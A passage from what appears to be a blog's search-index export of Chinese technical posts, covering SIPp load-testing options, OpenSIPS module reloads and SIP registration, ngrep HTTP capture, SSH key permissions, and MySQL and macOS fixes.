kept to improve message and error logs (default unit is ms). -default_behaviors: Set the default behaviors that SIPp will use. Possbile values are: - all\tUse all default behaviors - none\tUse no default behaviors - bye\tSend byes for aborted calls - abortunexp\tAbort calls on unexpected messages - pingreply\tReply to ping requests If a behavior is prefaced with a -, then it is turned off. Example: all,-bye -error_file : Set the name of the error log file. -error_overwrite : Overwrite the error log file (default true). -f : Set the statistics report frequency on screen. Default is 1 and default unit is seconds. -fd : Set the statistics dump log report frequency. Default is 60 and default unit is seconds. -i : Set the local IP address for \u0026#39;Contact:\u0026#39;,\u0026#39;Via:\u0026#39;, and \u0026#39;From:\u0026#39; headers. Default is primary host IP address. -inf : Inject values from an external CSV file during calls into the scenarios. First line of this file say whether the data is to be read in sequence (SEQUENTIAL), random (RANDOM), or user (USER) order. Each line corresponds to one call and has one or more \u0026#39;;\u0026#39; delimited data fields. Those fields can be referred as [field0], [field1], ... in the xml scenario file. Several CSV files can be used simultaneously (syntax: -inf f1.csv -inf f2.csv ...) -infindex : file field Create an index of file using field. For example -inf users.csv -infindex users.csv 0 creates an index on the first key. -ip_field : Set which field from the injection file contains the IP address from which the client will send its messages. If this option is omitted and the \u0026#39;-t ui\u0026#39; option is present, then field 0 is assumed. Use this option together with \u0026#39;-t ui\u0026#39; -l : Set the maximum number of simultaneous calls. Once this limit is reached, traffic is decreased until the number of open calls goes down. Default: (3 * call_duration (s) * rate). -log_file : Set the name of the log actions log file. -log_overwrite : Overwrite the log actions log file (default true). -lost : Set the number of packets to lose by default (scenario specifications override this value). -rtcheck : Select the retransmisison detection method: full (default) or loose. -m : Stop the test and exit when \u0026#39;calls\u0026#39; calls are processed -mi : Set the local media IP address (default: local primary host IP address) -master : 3pcc extended mode: indicates the master number -max_recv_loops : Set the maximum number of messages received read per cycle. Increase this value for high traffic level. The default value is 1000. -max_sched_loops : Set the maximum number of calsl run per event loop. Increase this value for high traffic level. The default value is 1000. -max_reconnect : Set the the maximum number of reconnection. -max_retrans : Maximum number of UDP retransmissions before call ends on timeout. Default is 5 for INVITE transactions and 7 for others. -max_invite_retrans: Maximum number of UDP retransmissions for invite transactions before call ends on timeout. -max_non_invite_retrans: Maximum number of UDP retransmissions for non-invite transactions before call ends on timeout. -max_log_size : What is the limit for error and message log file sizes. -max_socket : Set the max number of sockets to open simultaneously. This option is significant if you use one socket per call. Once this limit is reached, traffic is distributed over the sockets already opened. Default value is 50000 -mb : Set the RTP echo buffer size (default: 2048). -message_file : Set the name of the message log file. -message_overwrite: Overwrite the message log file (default true). -mp : Set the local RTP echo port number. Default is 6000. -nd : No Default. Disable all default behavior of SIPp which are the following: - On UDP retransmission timeout, abort the call by sending a BYE or a CANCEL - On receive timeout with no ontimeout attribute, abort the call by sending a BYE or a CANCEL - On unexpected BYE send a 200 OK and close the call - On unexpected CANCEL send a 200 OK and close the call - On unexpected PING send a 200 OK and continue the call - On any other unexpected message, abort the call by sending a BYE or a CANCEL -nr : Disable retransmission in UDP mode. -nostdin : Disable stdin. -p : Set the local port number. Default is a random free port chosen by the system. -pause_msg_ign : Ignore the messages received during a pause defined in the scenario -periodic_rtd : Reset response time partition counters each logging interval. -plugin : Load a plugin. -r : Set the call rate (in calls per seconds). This value can bechanged during test by pressing \u0026#39;+\u0026#39;,\u0026#39;_\u0026#39;,\u0026#39;*\u0026#39; or \u0026#39;/\u0026#39;. Default is 10. pressing \u0026#39;+\u0026#39; key to increase call rate by 1 * rate_scale, pressing \u0026#39;-\u0026#39; key to decrease call rate by 1 * rate_scale, pressing \u0026#39;*\u0026#39; key to increase call rate by 10 * rate_scale, pressing \u0026#39;/\u0026#39; key to decrease call rate by 10 * rate_scale. If the -rp option is used, the call rate is calculated with the period in ms given by the user. -rp : Specify the rate period for the call rate. Default is 1 second and default unit is milliseconds. This allows you to have n calls every m milliseconds (by using -r n -rp m). Example: -r 7 -rp 2000 ==\u0026gt; 7 calls every 2 seconds. -r 10 -rp 5s =\u0026gt; 10 calls every 5 seconds. -rate_scale : Control the units for the \u0026#39;+\u0026#39;, \u0026#39;-\u0026#39;, \u0026#39;*\u0026#39;, and \u0026#39;/\u0026#39; keys. -rate_increase : Specify the rate increase every -fd units (default is seconds). This allows you to increase the load for each independent logging period. Example: -rate_increase 10 -fd 10s ==\u0026gt; increase calls by 10 every 10 seconds. -rate_max : If -rate_increase is set, then quit after the rate reaches this value. Example: -rate_increase 10 -rate_max 100 ==\u0026gt; increase calls by 10 until 100 cps is hit. -no_rate_quit : If -rate_increase is set, do not quit after the rate reaches -rate_max. -recv_timeout : Global receive timeout. Default unit is milliseconds. If the expected message is not received, the call times out and is aborted. -send_timeout : Global send timeout. Default unit is milliseconds. If a message is not sent (due to congestion), the call times out and is aborted. -sleep : How long to sleep for at startup. Default unit is seconds. -reconnect_close : Should calls be closed on reconnect? -reconnect_sleep : How long (in milliseconds) to sleep between the close and reconnect? -ringbuffer_files: How many error/message files should be kept after rotation? -ringbuffer_size : How large should error/message files be before they get rotated? -rsa : Set the remote sending address to host:port for sending the messages. -rtp_echo : Enable RTP echo. RTP/UDP packets received on port defined by -mp are echoed to their sender. RTP/UDP packets coming on this port + 2 are also echoed to their sender (used for sound and video echo). -rtt_freq : freq is mandatory. Dump response times every freq calls in the log file defined by -trace_rtt. Default value is 200. -s : Set the username part of the resquest URI. Default is \u0026#39;service\u0026#39;. -sd : Dumps a default scenario (embeded in the sipp executable) -sf : Loads an alternate xml scenario file. To learn more about XML scenario syntax, use the -sd option to dump embedded scenarios. They contain all the necessary help. -shortmessage_file: Set the name of the short message log file. -shortmessage_overwrite: Overwrite the short message log file (default true). -oocsf : Load out-of-call scenario. -oocsn : Load out-of-call scenario. -skip_rlimit : Do not perform rlimit tuning of file descriptor limits. Default: false. -slave : 3pcc extended mode: indicates the slave number -slave_cfg : 3pcc extended mode: indicates the file where the master and slave addresses are stored -sn : Use a default scenario (embedded in the sipp executable). If this option is omitted, the Standard SipStone UAC scenario is loaded. Available values in this version: - \u0026#39;uac\u0026#39; : Standard SipStone UAC (default). - \u0026#39;uas\u0026#39; : Simple UAS responder. - \u0026#39;regexp\u0026#39; : Standard SipStone UAC - with regexp and variables. - \u0026#39;branchc\u0026#39; : Branching and conditional branching in scenarios - client. - \u0026#39;branchs\u0026#39; : Branching and conditional branching in scenarios - server. Default 3pcc scenarios (see -3pcc option): - \u0026#39;3pcc-C-A\u0026#39; : Controller A side (must be started after all other 3pcc scenarios) - \u0026#39;3pcc-C-B\u0026#39; : Controller B side. - \u0026#39;3pcc-A\u0026#39; : A side. - \u0026#39;3pcc-B\u0026#39; : B side. -stat_delimiter : Set the delimiter for the statistics file -stf : Set the file name to use to dump statistics -t : Set the transport mode: - u1: UDP with one socket (default), - un: UDP with one socket per call, - ui: UDP with one socket per IP address The IP addresses must be defined in the injection file. - t1: TCP with one socket, - tn: TCP with one socket per call, - l1: TLS with one socket, - ln: TLS with one socket per call, - s1: SCTP with one socket (default), - sn: SCTP with one socket per call, - c1: u1 + compression (only if compression plugin loaded), - cn: un + compression (only if compression plugin loaded). This plugin is not provided with sipp. -timeout : Global timeout. Default unit is seconds. If this option is set, SIPp quits after nb units (-timeout 20s quits after 20 seconds). -timeout_error : SIPp fails if the global timeout is reached is set (-timeout option required). -timer_resol : Set the timer resolution. Default unit is milliseconds. This option has an impact on timers precision.Small values allow more precise scheduling but impacts CPU usage.If the compression is on, the value is set to 50ms. The default value is 10ms. -T2 : Global T2-timer in milli seconds -sendbuffer_warn : Produce warnings instead of errors on SendBuffer failures. -trace_msg : Displays sent and received SIP messages in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_messages.log -trace_shortmsg : Displays sent and received SIP messages as CSV in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_shortmessages.log -trace_screen : Dump statistic screens in the \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_screens.log file when quitting SIPp. Useful to get a final status report in background mode (-bg option). -trace_err : Trace all unexpected messages in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_errors.log. -trace_calldebug : Dumps debugging information about aborted calls to \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_calldebug.log file. -trace_stat : Dumps all statistics in \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;.csv file. Use the \u0026#39;-h stat\u0026#39; option for a detailed description of the statistics file content. -trace_counts : Dumps individual message counts in a CSV file. -trace_rtt : Allow tracing of all response times in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_rtt.csv. -trace_logs : Allow tracing of \u0026lt;log\u0026gt; actions in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_logs.log. -users : Instead of starting calls at a fixed rate, begin \u0026#39;users\u0026#39; calls at startup, and keep the number of calls constant. -watchdog_interval: Set gap between watchdog timer firings. Default is 400. -watchdog_reset : If the watchdog timer has not fired in more than this time period, then reset the max triggers counters. Default is 10 minutes. -watchdog_minor_threshold: If it has been longer than this period between watchdog executions count a minor trip. Default is 500. -watchdog_major_threshold: If it has been longer than this period between watchdog executions count a major trip. Default is 3000. -watchdog_major_maxtriggers: How many times the major watchdog timer can be tripped before the test is terminated. Default is 10. -watchdog_minor_maxtriggers: How many times the minor watchdog timer can be tripped before the test is terminated. Default is 120. -tls_cert : Set the name for TLS Certificate file. Default is \u0026#39;cacert.pem -tls_key : Set the name for TLS Private Key file. Default is \u0026#39;cakey.pem\u0026#39; -tls_crl : Set the name for Certificate Revocation List file. If not specified, X509 CRL is not activated. -3pcc : Launch the tool in 3pcc mode (\u0026#34;Third Party call control\u0026#34;). The passed ip address is depending on the 3PCC role. - When the first twin command is \u0026#39;sendCmd\u0026#39; then this is the address of the remote twin socket. SIPp will try to connect to this address:port to send the twin command (This instance must be started after all other 3PCC scenarii). Example: 3PCC-C-A scenario. - When the first twin command is \u0026#39;recvCmd\u0026#39; then this is the address of the local twin socket. SIPp will open this address:port to listen for twin command. Example: 3PCC-C-B scenario. -tdmmap : Generate and handle a table of TDM circuits. A circuit must be available for the call to be placed. Format: -tdmmap {0-3}{99}{5-8}{1-31} -key : keyword value Set the generic parameter named \u0026#34;keyword\u0026#34; to \u0026#34;value\u0026#34;. -set : variable value Set the global variable parameter named \u0026#34;variable\u0026#34; to \u0026#34;value\u0026#34;. -multihome : Set multihome address for SCTP -heartbeat : Set heartbeat interval in ms for SCTP -assocmaxret : Set association max retransmit counter for SCTP -pathmaxret : Set path max retransmit counter for SCTP -pmtu : Set path MTU for SCTP -gracefulclose : If true, SCTP association will be closed with SHUTDOWN (default). If false, SCTP association will be closed by ABORT. -dynamicStart : variable value Set the start offset of dynamic_id varaiable -dynamicMax : variable value Set the maximum of dynamic_id variable -dynamicStep : variable value Set the increment of dynamic_id variable Signal handling: SIPp can be controlled using posix signals. The following signals are handled: USR1: Similar to press \u0026#39;q\u0026#39; keyboard key. It triggers a soft exit of SIPp. No more new calls are placed and all ongoing calls are finished before SIPp exits. Example: kill -SIGUSR1 732 USR2: Triggers a dump of all statistics screens in \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_screens.log file. Especially useful in background mode to know what the current status is. Example: kill -SIGUSR2 732 Exit code: Upon exit (on fatal error or when the number of asked calls (-m option) is reached, sipp exits with one of the following exit code: 0: All calls were successful 1: At least one call failed 97: exit on internal command. Calls may have been processed 99: Normal exit without calls processed -1: Fatal error -2: Fatal error binding a socket Example: Run sipp with embedded server (uas) scenario: ./sipp -sn uas On the same host, run sipp with embedded client (uac) scenario ./sipp -sn uac 127.0.0.1 参考 http://sipp.sourceforge.net/doc/reference.html http://sipp.sourceforge.net/doc3.3/reference.html 实战脚本学习 下面的两个链接里面有很多的真实场景测试的xml文件,可以用来深入学习\nhttps://github.com/pbertera/SIPp-by-example https://tomeko.net/other/sipp/sipp_cheatsheet.php?lang=pl 中文教程 sippZhong Wen Jiao Cheng - Knight.pdf 黄龙舟翻译 ","permalink":"https://wdd.js.org/opensips/tools/sipp/","summary":"安装 SIPp 3.3 # 解压 tar -zxvf sipp-3.3.990.tar.gz # centos 安装依赖 yum install lksctp-tools-devel libpcap-devel gcc-c++ gcc -y # ubuntu 安装以来 apt-get install -y pkg-config dh-autoreconf ncurses-dev build-essential libssl-dev libpcap-dev libncurses5-dev libsctp-dev lksctp-tools ./configure --with-sctp --with-pcap make \u0026amp;\u0026amp; make install sipp -v SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 6 2019, 20:12:17. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.","title":"SIPp:sip压测模拟ua工具"},{"content":"编译器面无表情的说:xxx.cfg 189行,有个地方多了个分号?\n但是你在在xxx.cfg的地189哼哧哼哧找了半天,满头大汗,也没发现有任何问题,这一行甚至连个分号都没有!!\n而实际上,这个问题并不是出在第189行,而是出在前面几行。\n所以说,编译器和女朋友的相同之处在于:**他们说的话,你不能全信,也不能不信。**而要从他们说的话中分析上下文,从蛛丝马迹中,寻求唯一的真相。\n","permalink":"https://wdd.js.org/posts/2019/09/myy94p/","summary":"编译器面无表情的说:xxx.cfg 189行,有个地方多了个分号?\n但是你在在xxx.cfg的地189哼哧哼哧找了半天,满头大汗,也没发现有任何问题,这一行甚至连个分号都没有!!\n而实际上,这个问题并不是出在第189行,而是出在前面几行。\n所以说,编译器和女朋友的相同之处在于:**他们说的话,你不能全信,也不能不信。**而要从他们说的话中分析上下文,从蛛丝马迹中,寻求唯一的真相。","title":"编译器和女朋友有什么相同之处"},{"content":" 参考 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/ http://www.sipcapture.org/ https://github.com/sipcapture/homer/wiki ","permalink":"https://wdd.js.org/opensips/ch5/homer6/","summary":" 参考 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/ http://www.sipcapture.org/ https://github.com/sipcapture/homer/wiki ","title":"opensips 集成 homer6"},{"content":"常见的问题 有时候如果你直接在数据库中改动某些值,但是opensips并没有按照预设的值去执行,那么你就要尝试使用mi命令去reload相关模块。\n有缓存模块 opensips在启动时,会将某些模块所使用的表一次性全部加载到数据库,状态变化时,再回写到数据库。有一下模块列表:\ndispather load_balancer carrierroute dialplan \u0026hellip; 判断一个模块是否是一次性加载到内存的,有个简便方法,看这个模块是否提供类似于 xx_reload的mi接口,有reload的mi接口,就说明这个模块是使用一次性读取,变化回写的方式读写数据库。\n将模块一次性加载到内存的好处时不用每次都查数据库,运行速度会大大提升。\n以dispather为例子,opensips在启动时会从数据库总加载一系列的目标到内存中,然后按照设定值,周期性的向目标发送options包,如果目标挂掉,三次未响应,opensips将会将该目标的状态设置为非0值,表示该地址不可用,同时将该状态回写到数据库。\n无缓存模块 无缓存的模块每次都会向数据库查询数据。常见的模块有alias_db,该模块的说明\nALIAS_DB module can be used as an alternative for user aliases via usrloc. The main feature is that it does not store all adjacent data as for user location and always uses database for search (no memory caching).\nALIAS_DB一般用于呼入时接入号的查询,在多租户的情况下,如果大多数租户都是使用呼入的场景,那么ALIAS_DB模块可能会是一个性能瓶颈,建议将该模块使用一些内存数据库替代。\n从浏览器reload模块 opensips在加载了httpd和mi_http模块之后,可以在opensips主机的8888端口访问到管理页面,具体地址如:http://opensips_host:8888/mi\n这个页面可以看到opensips所加载的模块,然后我们点击carrierroute, 可以看到该模块所支持的管理命令列表,如下图左侧列表所示,其中cr_reload_routes就是一个管理命令。\n然后我们点击cr_reload_routes连接,跳转到下图所示页面。参数可以不用填写,直接点击submit就可以。正常情况下回返回 200 : OK,就说明reload模块成功。\n使用curl命令reload模块 如果因为某些原因,无法访问web界面,那么可以使用curl等http命令行工具执行curl命令,例如\ncurl http://192.168.40.98:8888/mi/carrierroute/cr_reload_routes?arg= ","permalink":"https://wdd.js.org/opensips/ch3/cache-reload/","summary":"常见的问题 有时候如果你直接在数据库中改动某些值,但是opensips并没有按照预设的值去执行,那么你就要尝试使用mi命令去reload相关模块。\n有缓存模块 opensips在启动时,会将某些模块所使用的表一次性全部加载到数据库,状态变化时,再回写到数据库。有一下模块列表:\ndispather load_balancer carrierroute dialplan \u0026hellip; 判断一个模块是否是一次性加载到内存的,有个简便方法,看这个模块是否提供类似于 xx_reload的mi接口,有reload的mi接口,就说明这个模块是使用一次性读取,变化回写的方式读写数据库。\n将模块一次性加载到内存的好处时不用每次都查数据库,运行速度会大大提升。\n以dispather为例子,opensips在启动时会从数据库总加载一系列的目标到内存中,然后按照设定值,周期性的向目标发送options包,如果目标挂掉,三次未响应,opensips将会将该目标的状态设置为非0值,表示该地址不可用,同时将该状态回写到数据库。\n无缓存模块 无缓存的模块每次都会向数据库查询数据。常见的模块有alias_db,该模块的说明\nALIAS_DB module can be used as an alternative for user aliases via usrloc. The main feature is that it does not store all adjacent data as for user location and always uses database for search (no memory caching).\nALIAS_DB一般用于呼入时接入号的查询,在多租户的情况下,如果大多数租户都是使用呼入的场景,那么ALIAS_DB模块可能会是一个性能瓶颈,建议将该模块使用一些内存数据库替代。\n从浏览器reload模块 opensips在加载了httpd和mi_http模块之后,可以在opensips主机的8888端口访问到管理页面,具体地址如:http://opensips_host:8888/mi\n这个页面可以看到opensips所加载的模块,然后我们点击carrierroute, 可以看到该模块所支持的管理命令列表,如下图左侧列表所示,其中cr_reload_routes就是一个管理命令。\n然后我们点击cr_reload_routes连接,跳转到下图所示页面。参数可以不用填写,直接点击submit就可以。正常情况下回返回 200 : OK,就说明reload模块成功。\n使用curl命令reload模块 如果因为某些原因,无法访问web界面,那么可以使用curl等http命令行工具执行curl命令,例如\ncurl http://192.168.40.98:8888/mi/carrierroute/cr_reload_routes?arg= ","title":"模块缓存策略与reload方法"},{"content":" sequenceDiagram autonumber participant a as 192.168.0.123:55647 participant b as 1.2.3.4:5060 participant c as 172.10.10.3:49543 a-\u003e\u003eb: register cseq=1, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=2, callid=1 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=3, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=4, callid=1 b--\u003e\u003ea: 200 c-\u003e\u003eb: register cseq=5, callid=1 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=6, callid=1 b--\u003e\u003ec: 500 Service Unavailable c-\u003e\u003eb: register cseq=7, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=8, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=9, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=10, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=11, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=12, callid=2 b--\u003e\u003ec: 500 Service Unavailable a-\u003e\u003eb: register cseq=13, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=14, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=15, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=16, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=17, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=18, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=19, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=20, callid=3 b--\u003e\u003ea: 200 服务端设置的过期时间是120s 客户端每隔115s注册一次, callid和之前的保持不变 当网络变了之后,由于ip地址改变,客户端的在115秒注册,此时服务端还未超时,所以给客户端响应报错500 客户端在等了8秒之后,等待服务端超时,然后再次注册,再次注册时,callid改变 因为服务端已经超时,所以能够注册成功 需要注意的是,在一个注册周期内,客户端的注册信息包括IP、端口、协议、CallID都不能变,一旦改变了。如果服务端的记录还没有失效,新的注册就会失败。\n有的客户会经常反馈,他们的分机总是无辜掉线。经过抓包分析,发现分机每隔1.5分钟注册一次,使用tcp注册的,每次的端口号都会变成不同的值。\n然后尝试让分机用udp注册,分机就不再异常掉线了。\n一个tcp socket一旦关闭,新的tcp socket必然会被分配不同的端口。但是udp不一样,udp是无连接的。\n","permalink":"https://wdd.js.org/opensips/ch1/sip-register/","summary":"sequenceDiagram autonumber participant a as 192.168.0.123:55647 participant b as 1.2.3.4:5060 participant c as 172.10.10.3:49543 a-\u003e\u003eb: register cseq=1, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=2, callid=1 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=3, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=4, callid=1 b--\u003e\u003ea: 200 c-\u003e\u003eb: register cseq=5, callid=1 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=6, callid=1 b--\u003e\u003ec: 500 Service Unavailable c-\u003e\u003eb: register cseq=7, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=8, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=9, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=10, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=11, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=12, callid=2 b--\u003e\u003ec: 500 Service Unavailable a-\u003e\u003eb: register cseq=13, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=14, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=15, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=16, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=17, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=18, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=19, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=20, callid=3 b--\u003e\u003ea: 200 服务端设置的过期时间是120s 客户端每隔115s注册一次, callid和之前的保持不变 当网络变了之后,由于ip地址改变,客户端的在115秒注册,此时服务端还未超时,所以给客户端响应报错500 客户端在等了8秒之后,等待服务端超时,然后再次注册,再次注册时,callid改变 因为服务端已经超时,所以能够注册成功 需要注意的是,在一个注册周期内,客户端的注册信息包括IP、端口、协议、CallID都不能变,一旦改变了。如果服务端的记录还没有失效,新的注册就会失败。","title":"SIP注册调研"},{"content":"报错信息如下\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for \u0026#39;mmmmm\u0026#39; are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. 解决方案:将你的私钥的权限改为600, 也就是说只有你自己可读可写,其他人都不能用\nchmod 600 你的私钥 ","permalink":"https://wdd.js.org/posts/2019/08/vhovcg/","summary":"报错信息如下\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for \u0026#39;mmmmm\u0026#39; are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. 解决方案:将你的私钥的权限改为600, 也就是说只有你自己可读可写,其他人都不能用\nchmod 600 你的私钥 ","title":"ssh 私钥使用失败"},{"content":"两种头 via headers 响应按照Via字段向前走 route headers 请求按照route字段向前走 Via头 当uac发送请求时, 每个ua都会加上自己的via头, via都的顺序很重要,每个节点都需要将自己的Via头加在最上面 响应消息按照via头记录的地址返回,每次经过自己的node时候,要去掉自己的via头 via用来指明消息应该按照什么 Route头 路由模块 模块 CARRIERROUTE DISPATCHER DROUTING LOAD_BALANCER ","permalink":"https://wdd.js.org/opensips/ch5/via-route/","summary":"两种头 via headers 响应按照Via字段向前走 route headers 请求按照route字段向前走 Via头 当uac发送请求时, 每个ua都会加上自己的via头, via都的顺序很重要,每个节点都需要将自己的Via头加在最上面 响应消息按照via头记录的地址返回,每次经过自己的node时候,要去掉自己的via头 via用来指明消息应该按照什么 Route头 路由模块 模块 CARRIERROUTE DISPATCHER DROUTING LOAD_BALANCER ","title":"SIP路由头"},{"content":"一般使用tcpdump抓包,然后将包文件下载到本机,用wireshark去解析过滤。\n但是这样会显得比较麻烦。\nngrep可以直接在linux转包,明文查看http的请求和响应信息。\n安装 apt install ngrep # debian yum install ngrep # centos7 # 如果centos报错没有ngrep, 那么执行下面的命令, 然后再安装 rpm -ivh http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm HTTP抓包 -W byline 头信息会自动换行 host 192.168.60.200 是过滤规则 源ip或者目的ip是192.168.60.200 ngrep -W byline host 192.168.60.200 interface: eth0 (192.168.1.0/255.255.255.0) filter: (ip or ip6) and ( host 192.168.60.200 ) #### T 192.168.1.102:39510 -\u0026gt; 192.168.60.200:7775 [AP] GET / HTTP/1.1. Host: 192.168.60.200:7775. User-Agent: curl/7.52.1. Accept: */*. . # T 192.168.60.200:7775 -\u0026gt; 192.168.1.102:39510 [AP] HTTP/1.1 302 Moved Temporarily. Server: Apache-Coyote/1.1. Set-Cookie: JSESSIONID=211CA612EC681B9FDCE7726B03F42088; Path=/; HttpOnly. Location: http://192.168.60.200:7775/homepage.action. Content-Type: text/html. Content-Length: 0. Date: Fri, 16 Aug 2019 02:16:51 GMT. 过滤规则 按IP地址过滤 ngrep -W byline host 192.168.60.200 # 源地址或者目的地址是 192.168.60.200 按端口过滤 ngrep -W byline port 80 # 源端口或者目的端口是 80 按照正则匹配 ngrep -W byline -q HTTP # 匹配所有包中含有HTTP的 指定网卡 默认情况下,ngrep使用网卡列表中的一个网卡,当然你也可以使用-d选项来指定抓包某个网卡。\nngrep -W byline -d eth0 host 192.168.60.200 参考 https://www.tecmint.com/ngrep-network-packet-analyzer-for-linux/ https://github.com/jpr5/ngrep ","permalink":"https://wdd.js.org/network/pxn896/","summary":"一般使用tcpdump抓包,然后将包文件下载到本机,用wireshark去解析过滤。\n但是这样会显得比较麻烦。\nngrep可以直接在linux转包,明文查看http的请求和响应信息。\n安装 apt install ngrep # debian yum install ngrep # centos7 # 如果centos报错没有ngrep, 那么执行下面的命令, 然后再安装 rpm -ivh http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm HTTP抓包 -W byline 头信息会自动换行 host 192.168.60.200 是过滤规则 源ip或者目的ip是192.168.60.200 ngrep -W byline host 192.168.60.200 interface: eth0 (192.168.1.0/255.255.255.0) filter: (ip or ip6) and ( host 192.168.60.200 ) #### T 192.168.1.102:39510 -\u0026gt; 192.168.60.200:7775 [AP] GET / HTTP/1.1. Host: 192.168.60.200:7775. User-Agent: curl/7.52.1. Accept: */*. . # T 192.168.60.200:7775 -\u0026gt; 192.168.1.102:39510 [AP] HTTP/1.1 302 Moved Temporarily.","title":"ngrep明文http抓包教程"},{"content":"一般拷贝全文分为以下几步\n使用编辑器打开文件 全文选择文件 执行拷贝命令 实际上操作系统提供了一些命令,可以在不打开文件的情况下,将文件内容复制到剪贴板。\nmac pbcopy cat aaa.txt | pbcopy linux xsel cat aaa.txt | xsel windows clip cat aaa.txt | clip ","permalink":"https://wdd.js.org/posts/2019/08/iyotwd/","summary":"一般拷贝全文分为以下几步\n使用编辑器打开文件 全文选择文件 执行拷贝命令 实际上操作系统提供了一些命令,可以在不打开文件的情况下,将文件内容复制到剪贴板。\nmac pbcopy cat aaa.txt | pbcopy linux xsel cat aaa.txt | xsel windows clip cat aaa.txt | clip ","title":"在不打开文件,将全文复制到剪贴板"},{"content":"解决方案 方案1: sudo kill -9 `ps aux | grep -v grep | grep /usr/libexec/airportd | awk \u0026#39;{print $2}\u0026#39;` 或者任务管理器搜索并且杀掉airportd这个进程\n参考 https://discussionschinese.apple.com/thread/140138832?answerId=140339277322#140339277322 https://www.v2ex.com/t/505737 https://blog.csdn.net/Goals1989/article/details/88578012 ","permalink":"https://wdd.js.org/posts/2019/08/gw9eka/","summary":"解决方案 方案1: sudo kill -9 `ps aux | grep -v grep | grep /usr/libexec/airportd | awk \u0026#39;{print $2}\u0026#39;` 或者任务管理器搜索并且杀掉airportd这个进程\n参考 https://discussionschinese.apple.com/thread/140138832?answerId=140339277322#140339277322 https://www.v2ex.com/t/505737 https://blog.csdn.net/Goals1989/article/details/88578012 ","title":"macbook pro 开机后wifi无响应问题调研"},{"content":"编辑/etc/my.cnf,增加skip-name-resolve\nskip-name-resolve 然后重启mysql\n","permalink":"https://wdd.js.org/posts/2019/08/kieuga/","summary":"编辑/etc/my.cnf,增加skip-name-resolve\nskip-name-resolve 然后重启mysql","title":"mysql远程连接速度太慢"},{"content":"github向我推荐这个xmysql时候,我瞟了一眼它的简介One command to generate REST APIs for any MySql Database, 说实话这个介绍让我眼前一亮,想想每次向后端的同学要个接口的时候,他们总是要哼哧哼哧搞个半天给才能我。抱着试试看的心态,我试用了一个疗程,oh不是, 是安装并使用了一下。 说实话,体验是蛮不错的,但是体验一把过后,我想不到这个工具的使用场景,因为你不可能把数据库的所有表都公开出来,让前端随意读写, 但是试试看总是不错的.\n1 来吧,冒险一次! 安装与使用\nnpm install -g xmysqlxmysql -h localhost -u mysqlUsername -p mysqlPassword -d databaseName浏览器打开:http://localhost:3000, 